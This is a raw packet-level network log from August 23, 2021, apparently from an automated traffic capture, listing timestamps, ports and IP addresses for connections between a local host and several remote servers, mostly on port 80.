Aug 23, 2021 02:09:04.985028028 CEST	49806	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.007940054 CEST	80	49805	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.008091927 CEST	49805	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.010318041 CEST	80	49806	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.010467052 CEST	49806	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.011647940 CEST	49806	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.036844969 CEST	80	49806	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.038542986 CEST	80	49806	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.038561106 CEST	80	49806	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.038916111 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.038928986 CEST	49806	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.038944960 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.039146900 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.039170980 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.111294985 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.111454010 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.149559975 CEST	49806	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.174824953 CEST	80	49806	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.174940109 CEST	49806	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.185487032 CEST	49807	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.210819960 CEST	80	49807	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.210941076 CEST	49807	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.212291002 CEST	49807	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.238609076 CEST	80	49807	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.239435911 CEST	80	49807	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.239489079 CEST	80	49807	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.239552021 CEST	49807	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.239597082 CEST	49807	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.353071928 CEST	49807	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.378413916 CEST	80	49807	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.378587008 CEST	49807	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.394026041 CEST	49808	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.397811890 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.419348001 CEST	80	49808	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.419503927 CEST	49808	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.419970989 CEST	49808	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.423079014 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.423233032 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.424007893 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.424181938 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.424489021 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.424662113 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.445130110 CEST	80	49808	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.445760965 CEST	80	49808	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.445784092 CEST	80	49808	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.445878983 CEST	49808	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.449240923 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.449271917 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.449953079 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.449970007 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.449979067 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.449986935 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.450151920 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.450229883 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.476001024 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.476023912 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.476033926 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.476325035 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.476463079 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.476480961 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.476495981 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.476537943 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.476552010 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.476571083 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.476744890 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.476828098 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.482218027 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.502579927 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.502613068 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.502646923 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.502676010 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.502717972 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.503220081 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.503251076 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.503350019 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.503380060 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.503403902 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.507440090 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.507468939 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.507497072 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.507523060 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.507545948 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.507570982 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.527951002 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.527982950 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.528008938 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.531025887 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.531058073 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.531235933 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.531620026 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.531838894 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.535942078 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.537877083 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.555867910 CEST	49808	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.556792974 CEST	80	49809	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.556869984 CEST	49809	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.557251930 CEST	49811	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.581068993 CEST	80	49808	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.581139088 CEST	49808	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.582268953 CEST	80	49811	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.582360029 CEST	49811	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.583051920 CEST	49811	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.593616962 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.593746901 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.594502926 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.594676971 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.594907045 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.595065117 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.595978975 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.596051931 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.608138084 CEST	80	49811	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.608669043 CEST	80	49811	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.608686924 CEST	80	49811	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.608787060 CEST	49811	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.650405884 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.650444031 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.650604963 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.650681973 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.650747061 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.650851011 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.650854111 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.650878906 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.650940895 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.650969028 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.708146095 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.708208084 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.708237886 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.708276987 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.708276033 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.708312035 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.708316088 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.708327055 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.708344936 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.708345890 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.708375931 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.708426952 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.708586931 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.708652020 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.708684921 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.708714962 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.708879948 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.708944082 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.708951950 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.708965063 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.708969116 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.712236881 CEST	49811	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.713619947 CEST	49812	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.738316059 CEST	80	49811	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.739645004 CEST	49811	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.739703894 CEST	80	49812	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.739865065 CEST	49812	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.740489006 CEST	49812	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.764450073 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.764504910 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.764533043 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.764571905 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.764597893 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.764621019 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.764713049 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.764851093 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.765002012 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.765084028 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.765116930 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.765187979 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.765269041 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.765345097 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.765537024 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.765635014 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.765717030 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.765849113 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.765908003 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.765937090 CEST	80	49812	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.766109943 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.766541958 CEST	80	49812	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.766572952 CEST	80	49812	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.766674042 CEST	49812	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.766753912 CEST	49812	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.820605993 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.820627928 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.820643902 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.820713043 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:05.820749044 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.820914984 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.820930004 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.821120024 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.821526051 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.821733952 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.821891069 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.821973085 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.822158098 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.822238922 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.876779079 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.876827002 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:05.885979891 CEST	49812	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.887196064 CEST	49813	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.911626101 CEST	80	49812	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.911740065 CEST	49812	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.912476063 CEST	80	49813	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.912594080 CEST	49813	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.949814081 CEST	49813	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.975331068 CEST	80	49813	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.975801945 CEST	80	49813	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.975820065 CEST	80	49813	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:05.975914001 CEST	49813	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.975963116 CEST	49813	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:05.992012024 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:06.048197031 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:06.094631910 CEST	49813	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.095746994 CEST	49814	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.120086908 CEST	80	49813	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.120246887 CEST	49813	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.121045113 CEST	80	49814	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.121151924 CEST	49814	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.122497082 CEST	49814	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.147758007 CEST	80	49814	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.148478031 CEST	80	49814	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.148509026 CEST	80	49814	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.148595095 CEST	49814	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.148612022 CEST	49814	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.263916969 CEST	49814	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.265407085 CEST	49815	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.289222002 CEST	80	49814	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.289316893 CEST	49814	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.290678978 CEST	80	49815	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.290781021 CEST	49815	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.292057991 CEST	49815	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.304510117 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:06.317322969 CEST	80	49815	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.318063021 CEST	80	49815	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.318094015 CEST	80	49815	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.318130016 CEST	49815	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.318159103 CEST	49815	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.360447884 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:06.405539036 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:06.405821085 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:06.430505991 CEST	49815	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.432498932 CEST	49816	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.455868006 CEST	80	49815	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.455965042 CEST	49815	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.457828045 CEST	80	49816	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.457937956 CEST	49816	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.458566904 CEST	49816	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.483822107 CEST	80	49816	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.486041069 CEST	80	49816	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.486083031 CEST	80	49816	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.486119986 CEST	49816	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.486171007 CEST	49816	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.648200989 CEST	49816	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:06.673523903 CEST	80	49816	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:06.673631907 CEST	49816	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.296391964 CEST	80	49785	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:07.296427011 CEST	80	49785	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:07.296632051 CEST	49785	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:07.296715975 CEST	49785	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:07.344961882 CEST	49817	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:07.568306923 CEST	80	49785	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:07.619621038 CEST	80	49817	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:07.619728088 CEST	49817	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:07.619990110 CEST	49817	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:07.620006084 CEST	49817	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:07.677568913 CEST	49818	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.703111887 CEST	80	49818	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.703305006 CEST	49818	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.709634066 CEST	49818	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.715718985 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.734966040 CEST	80	49818	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.735488892 CEST	80	49818	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.735507011 CEST	80	49818	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.735611916 CEST	49818	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.741137981 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.741285086 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.741775990 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.741919994 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.742336988 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.742422104 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.751653910 CEST	49820	25802	192.168.2.3	188.124.36.242
Aug 23, 2021 02:09:07.767139912 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.767184973 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.767554998 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.767692089 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.767704964 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.767735004 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.767760992 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.767771006 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.767801046 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.767807961 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.767823935 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.767844915 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.767879009 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.767879963 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.767915964 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.767920971 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.767952919 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.767952919 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.767980099 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.768002033 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.793303013 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.793366909 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.793415070 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.793454885 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.793458939 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.793509960 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.793519974 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.793565035 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.793632984 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.793813944 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.793946028 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.794055939 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.794091940 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.794127941 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.794131994 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.794174910 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.794224024 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.794255972 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.794334888 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.807748079 CEST	25802	49820	188.124.36.242	192.168.2.3
Aug 23, 2021 02:09:07.807990074 CEST	49820	25802	192.168.2.3	188.124.36.242
Aug 23, 2021 02:09:07.819080114 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.819221973 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.819317102 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.819412947 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.820070982 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.820096970 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.820132017 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.820168018 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.820200920 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.820233107 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.821927071 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.822017908 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.822053909 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.822092056 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.822125912 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.822160006 CEST	80	49819	185.206.180.136	192.168.2.3
